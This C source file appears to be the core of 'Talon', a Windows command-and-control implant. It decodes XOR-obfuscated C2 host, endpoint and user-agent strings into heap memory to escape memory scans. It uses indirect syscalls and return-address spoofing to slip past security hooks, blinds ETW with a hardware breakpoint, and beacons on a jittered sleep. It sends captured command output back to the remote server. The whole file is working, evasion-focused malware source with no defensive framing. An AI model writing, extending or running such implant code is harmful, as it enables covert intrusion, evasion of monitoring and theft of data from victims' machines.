#include <Talon.h>

#include <Core.h>
#include <Config.h>
#include <Package.h>
#include <Command.h>
#include <Syscall.h>
#include <Spoof.h>
#include <Etw.h>

// --- XOR-obfuscated transport strings (generated by tools/gen_config.py) ---
static const UCHAR CfgUaKey[ 16 ] = {
    0xA8, 0x46, 0x02, 0xAE, 0x51, 0xED, 0x9B, 0x41, 0x13, 0xCA, 0x64, 0xB8,
    0x87, 0xC3, 0x4C, 0x38
};
static const UCHAR CfgUaXor[ 220 ] = {
    0xE5, 0x46, 0x6D, 0xAE, 0x2B, 0xED, 0xF2, 0x41, 0x7F, 0xCA, 0x08, 0xB8,
    0xE6, 0xC3, 0x63, 0x38, 0x9D, 0x46, 0x2C, 0xAE, 0x61, 0xED, 0xBB, 0x41,
    0x3B, 0xCA, 0x33, 0xB8, 0xEE, 0xC3, 0x22, 0x38, 0xCC, 0x46, 0x6D, 0xAE,
    0x26, 0xED, 0xE8, 0x41, 0x33, 0xCA, 0x2A, 0xB8, 0xD3, 0xC3, 0x6C, 0x38,
    0x9E, 0x46, 0x2C, 0xAE, 0x60, 0xED, 0xA0, 0x41, 0x33, 0xCA, 0x33, 0xB8,
    0xC8, 0xC3, 0x1B, 0x38, 0x9E, 0x46, 0x36, 0xAE, 0x78, 0xED, 0xBB, 0x41,
    0x52, 0xCA, 0x14, 0xB8, 0xF7, 0xC3, 0x20, 0x38, 0xCD, 0x46, 0x55, 0xAE,
    0x34, 0xED, 0xF9, 0x41, 0x58, 0xCA, 0x0D, 0xB8, 0xF3, 0xC3, 0x63, 0x38,
    0x9D, 0x46, 0x31, 0xAE, 0x66, 0xED, 0xB5, 0x41, 0x20, 0xCA, 0x52, 0xB8,
    0xA7, 0xC3, 0x64, 0x38, 0xE3, 0x46, 0x4A, 0xAE, 0x05, 0xED, 0xD6, 0x41,
    0x5F, 0xCA, 0x48, 0xB8, 0xA7, 0xC3, 0x20, 0x38, 0xC1, 0x46, 0x69, 0xAE,
    0x34, 0xED, 0xBB, 0x41, 0x54, 0xCA, 0x01, 0xB8, 0xE4, 0xC3, 0x27, 0x38,
    0xC7, 0x46, 0x2B, 0xAE, 0x71, 0xED, 0xD8, 0x41, 0x7B, 0xCA, 0x16, 0xB8,
    0xE8, 0xC3, 0x21, 0x38, 0xCD, 0x46, 0x2D, 0xAE, 0x68, 0xED, 0xAD, 0x41,
    0x3D, 0xCA, 0x54, 0xB8, 0xA9, 0xC3, 0x78, 0x38, 0x9E, 0x46, 0x34, 0xAE,
    0x65, 0xED, 0xB5, 0x41, 0x22, 0xCA, 0x55, 0xB8, 0xB7, 0xC3, 0x6C, 0x38,
    0xFB, 0x46, 0x63, 0xAE, 0x37, 0xED, 0xFA, 0x41, 0x61, 0xCA, 0x0D, 0xB8,
    0xA8, 0xC3, 0x79, 0x38, 0x9B, 0x46, 0x35, 0xAE, 0x7F, 0xED, 0xA8, 0x41,
    0x25, 0xCA, 0x64, 0xB8
};
static const UCHAR CfgHostKey[ 16 ] = {
    0x7D, 0x8F, 0x72, 0x51, 0x86, 0x26, 0x45, 0xF7, 0x33, 0x89, 0x5E, 0xBC,
    0x56, 0x3F, 0xDF, 0x3E
};
static const UCHAR CfgHostXor[ 28 ] = {
    0x4C, 0x8F, 0x42, 0x51, 0xA8, 0x26, 0x70, 0xF7, 0x03, 0x89, 0x70, 0xBC,
    0x67, 0x3F, 0xEF, 0x3E, 0x4D, 0x8F, 0x5C, 0x51, 0xB7, 0x26, 0x77, 0xF7,
    0x01, 0x89, 0x5E, 0xBC
};
static const UCHAR CfgEpKey[ 16 ] = {
    0xAA, 0x24, 0xC0, 0x38, 0x8C, 0x71, 0x51, 0x5E, 0xE1, 0x8E, 0x63, 0xFC,
    0x2C, 0xA4, 0x36, 0x2D
};
static const UCHAR CfgEpXor[ 36 ] = {
    0x85, 0x24, 0xB3, 0x38, 0xE9, 0x71, 0x23, 0x5E, 0x97, 0x8E, 0x0A, 0xFC,
    0x4F, 0xA4, 0x53, 0x2D, 0x87, 0x24, 0xA5, 0x38, 0xE2, 0x71, 0x35, 0x5E,
    0x91, 0x8E, 0x0C, 0xFC, 0x45, 0xA4, 0x58, 0x2D, 0xDE, 0x24, 0xC0, 0x38
};

VOID ConfigDecode( VOID )
{
    // Decode XOR-obfuscated transport strings into heap buffers so the
    // plaintext never sits in .rdata (memory-scan surface).
    PUCHAR Buf = NULL;
    SIZE_T i   = 0;

    Buf = LocalAlloc( LPTR, sizeof( CfgUaXor ) );
    if ( Buf ) {
        for ( i = 0; i < sizeof( CfgUaXor ); i++ )
            Buf[ i ] = CfgUaXor[ i ] ^ CfgUaKey[ i % 16 ];
        Instance.Config.Transport.UserAgent = ( LPWSTR ) Buf;
    }

    Buf = LocalAlloc( LPTR, sizeof( CfgHostXor ) );
    if ( Buf ) {
        for ( i = 0; i < sizeof( CfgHostXor ); i++ )
            Buf[ i ] = CfgHostXor[ i ] ^ CfgHostKey[ i % 16 ];
        Instance.Config.Transport.Host = ( LPWSTR ) Buf;
    }

    Buf = LocalAlloc( LPTR, sizeof( CfgEpXor ) );
    if ( Buf ) {
        for ( i = 0; i < sizeof( CfgEpXor ); i++ )
            Buf[ i ] = CfgEpXor[ i ] ^ CfgEpKey[ i % 16 ];
        Instance.Config.Transport.Endpoint = ( LPWSTR ) Buf;
    }
}

VOID TalonInit()
{
    // Init Connection info
    ConfigDecode();
    Instance.Config.Transport.Port      = CONFIG_PORT;
    Instance.Config.Transport.Secure    = CONFIG_SECURE;

    // Init Win32
    Instance.Win32.RtlRandomEx   = (ULONG (*)(ULONG *)) GetProcAddress( GetModuleHandleA( "ntdll" ), "RtlRandomEx" );
    Instance.Win32.RtlGetVersion = (void (*)(struct _OSVERSIONINFOEXW *)) GetProcAddress( GetModuleHandleA( "ntdll" ), "RtlGetVersion" );
    Instance.Win32.WaitForSingleObjectEx = (DWORD (*)(HANDLE, DWORD, BOOL)) GetProcAddress( GetModuleHandleA( "kernel32" ), "WaitForSingleObjectEx" );

    // Indirect syscall for the sleep primitive (bypasses kernel32/ntdll hooks)
    TalonSyscallInit();

    // Probe kernel32 for a return-address-spoofing gadget (WinHttp calls)
    SpoofInit();

    // ETW interception: VEH + Dr0 breakpoint on ntdll!NtTraceEvent
    EtwInit();

    Instance.Session.AgentID = RandomNumber32();
    Instance.Config.Sleeping = CONFIG_SLEEP;
    Instance.Config.Jitter   = CONFIG_JITTER;

    Dbg( "AgentID     => %x\n", Instance.Session.AgentID );
    Dbg( "Magic Value => %x\n", TALON_MAGIC_VALUE );
}

// Jittered sleep: base +/- Jitter%. Preferred path is the indirect syscall
// NtDelayExecution (SysInvoke tail-jumps ntdll's own `syscall` instruction),
// which no user-mode kernel32/ntdll hook can intercept. Falls back to
// WaitForSingleObjectEx (resolved at runtime, not imported) and finally to
// the imported Sleep — no fixed cadence on any path.
VOID TalonSleep( VOID )
{
    DWORD Base = Instance.Config.Sleeping * 1000;
    DWORD Var  = ( Instance.Config.Jitter * Base ) / 100;
    DWORD T    = Base;

    if ( Var ) {
        ULONG Rand = RandomNumber32() % ( Var + 1 );
        if ( RandomNumber32() & 1 )
            T += Rand;
        else if ( T > Rand )
            T -= Rand;
    }

    // NtDelayExecution( Alertable, PLARGE_INTEGER ) — negative = relative,
    // units of 100 ns.
    if ( Instance.Syscall.Ready ) {
        LARGE_INTEGER li;
        li.QuadPart = - ( ( LONGLONG ) T * 10000 );
        SysInvoke( FALSE, &li, &Instance.Syscall.NtDelayExecution );
        return;
    }

    if ( Instance.Win32.WaitForSingleObjectEx ) {
        Instance.Win32.WaitForSingleObjectEx( GetCurrentProcess(), T, FALSE );
        return;
    }

    Sleep( Base );
}

// Pointer-walk form on purpose: GCC recognises the "while ( s[n] ) n++"
// counting loop as a strlen builtin and emits an orphan msvcrt.dll import
// for it even with -fno-builtin-strlen. This shape compiles to a plain loop.
SIZE_T StrLenA( LPCSTR s )
{
    const char * p = s;
    while ( *p )
        p++;
    return ( SIZE_T )( p - s );
}

VOID AnonPipeRead( HANDLE hSTD_OUT_Read )
{
    PPACKAGE Package         = NULL;
    LPVOID   pOutputBuffer   = NULL;
    UCHAR    buf[ 1025 ]     = { 0 };
    DWORD    dwBufferSize    = 0;
    DWORD    dwRead          = 0;
    BOOL     SuccessFul      = FALSE;

    pOutputBuffer = LocalAlloc( LPTR, sizeof(LPVOID) );

    do
    {
        SuccessFul = ReadFile( hSTD_OUT_Read, buf, 1024, &dwRead, NULL );

        if ( dwRead == 0)
            break;

        pOutputBuffer = LocalReAlloc(
            pOutputBuffer,
            dwBufferSize + dwRead,
            LMEM_MOVEABLE | LMEM_ZEROINIT
        );

        dwBufferSize += dwRead;

        memcpy( pOutputBuffer + ( dwBufferSize - dwRead ), buf, dwRead );
        memset( buf, 0, dwRead );

    } while ( SuccessFul == TRUE );

    Package = PackageCreate( COMMAND_OUTPUT );

    PackageAddBytes( Package, pOutputBuffer, dwBufferSize );
    PackageTransmit( Package, NULL, NULL );

    memset( pOutputBuffer, 0, dwBufferSize );
    LocalFree( pOutputBuffer );
    pOutputBuffer = NULL;
}

ULONG RandomNumber32( VOID )
{
    ULONG Seed = 0;

    Seed = GetTickCount();
    Seed = Instance.Win32.RtlRandomEx( &Seed );
    Seed = Instance.Win32.RtlRandomEx( &Seed );
    Seed = ( Seed % ( LONG_MAX - 2 + 1 ) ) + 2;

    return Seed % 2 == 0 ? Seed : Seed + 1;
}
